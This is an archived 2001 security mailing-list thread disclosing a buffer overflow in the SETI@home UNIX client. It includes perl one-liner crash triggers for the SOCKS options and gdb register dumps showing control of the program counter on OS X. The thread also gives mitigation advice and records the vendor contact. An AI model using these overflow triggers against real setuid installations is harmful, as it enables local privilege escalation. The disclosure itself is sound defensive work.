Vulnerability Development mailing list archives
Re: Vulnerability in SETI@home
From: dotslash () snosoft com
Date: Sat, 1 Dec 2001 23:33:49 -0800
Also on joes post he did not show an eip overwrite but on OSX we are able to overwrite the pc register.
Starting program: /Users/elguapo/./setiathome-3.03.powerpc- apple.1/setiathome -socks_user `perl -e 'print "A" x 9000'` [Switching to thread 1 (process 612 thread 0x1907)] Program received signal EXC_BAD_ACCESS, Could not access memory. 0x41414140 in ?? () (gdb) i r r0 0x278c 10124 r1 0xbfffd670 3221214832 r2 0x3021c 197148 r3 0x16250 90704 r4 0x201 513 r5 0x1a4 420 r6 0x400 1024 r7 0x2e 46 r8 0x170 368 r9 0x3 3 r10 0x53 83 r11 0x2cbc4 183236 r12 0x41414141 1094795585 r13 0x0 0 r14 0x0 0 r15 0x0 0 r16 0x0 0 r17 0x0 0 r18 0x0 0 r19 0x0 0 r20 0x0 0 r21 0x3 3 r22 0x0 0 r23 0x1 1 r24 0xffffffff 4294967295 r25 0x0 0 r26 0x0 0 r27 0x1 1 r28 0xbfffd7e0 3221215200 r29 0x0 0 r30 0x0 0 r31 0x2774 10100 pc 0x41414140 1094795584 ps 0x4000f030 1073803312 cr 0x22000284 570425988 lr 0x278c 10124 ctr 0x41414141 1094795585 xer 0x20 32 mq 0x0 0 fpscr 0x0 0 vrsave 0x0 0 -KF On Sunday, December 2, 2001, at 03:15 PM, joetesta () hushmail com wrote:
-----BEGIN PGP SIGNED MESSAGE----- Vulnerability in SETI@home OverviewSETI@home (http://setiathome.berkeley.edu/) is a distributed project thatallows ordinary citizens participate in the search for extraterrestrial intelligence using their computer's idle time. A buffer overflow exists in the UNIX client software.NOTE: this vulnerability is NOT exploitable in the default installation.Details The "i386-pc-linux-gnu-gnulibc2.1" version of the setiathome client (and possibly others) is vulnerable to buffer overflow. Example: # ./setiathome -version SETI@home client. Platform: i386-pc-linux-gnu-gnulibc2.1 Version: 3.03 ... ... # ./setiathome -socks_server `perl -e 'print "A" x 5604;'` Segmentation fault # ./setiathome -socks_user `perl -e 'print "A" x 5344;'` Segmentation fault # ./setiathome -socks_passwd `perl -e 'print "A" x 5280;'` Segmentation fault # [root@seti /home/setiathome]# gdb setiathome GNU gdb 5.0rh-5 Red Hat Linux 7.1 Copyright 2001 Free Software Foundation, Inc.GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions.Type "show copying" to see the conditions.There is absolutely no warranty for GDB. Type "show warranty" for details.This GDB was configured as "i386-redhat-linux"... (no debugging symbols found)... (gdb) r -socks_server `perl -e 'print "A" x 5604;'`Starting program: /home/setiathome/setiathome -socks_server `perl -e 'print "A" x 5604;'`Program received signal SIGSEGV, Segmentation fault. 0x2ab4d409 in strcpy () from /lib/libc.so.6 (gdb) info registers eax 0x0 0 ecx 0x40404040 1077952576 edx 0x41414141 1094795585 ebx 0xfefefeff -16843009 esp 0x7fffe664 0x7fffe664 ebp 0x7fffe6bc 0x7fffe6bc esi 0x7ffffe28 2147483176 edi 0x807bffd 134725629 eip 0x2ab4d409 0x2ab4d409 eflags 0x10246 66118 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 fctrl 0x37f 895 fstat 0x0 0 ftag 0xffff 65535 fiseg 0x0 0 fioff 0x0 0 foseg 0x0 0 fooff 0x0 0 fop 0x0 0 Solution The SETI@home UNIX client is not installed with a setuid bit by default.If one was added to it -- perhaps to run it under a 'setiathome' account --remove it immediately. Vendor Status The project directory, Dr. Dave P. Anderson, was contacted via <davea () ssl berkeley edu> on Monday, Nov 5th. He promptly replied that this problem will be fixed in the next release. - Joe Testa e-mail: joetesta () hushmail com web page: http://hogs.rit.edu/~joet/ AIM: LordSpankatron -----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com wl0EARECAB0FAjwKtmIWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNGeO AJ9lCce/+Xb91i7BzpWvEiGfnUmBTgCginYcBQJ1WcuQeBC/RDyELpNvKIQ= =M4UW -----END PGP SIGNATURE-----
Current thread:
- Vulnerability in SETI@home joetesta (Dec 02)
- Re: Vulnerability in SETI@home dotslash (Dec 03)
- Re: Vulnerability in SETI@home dotslash (Dec 03)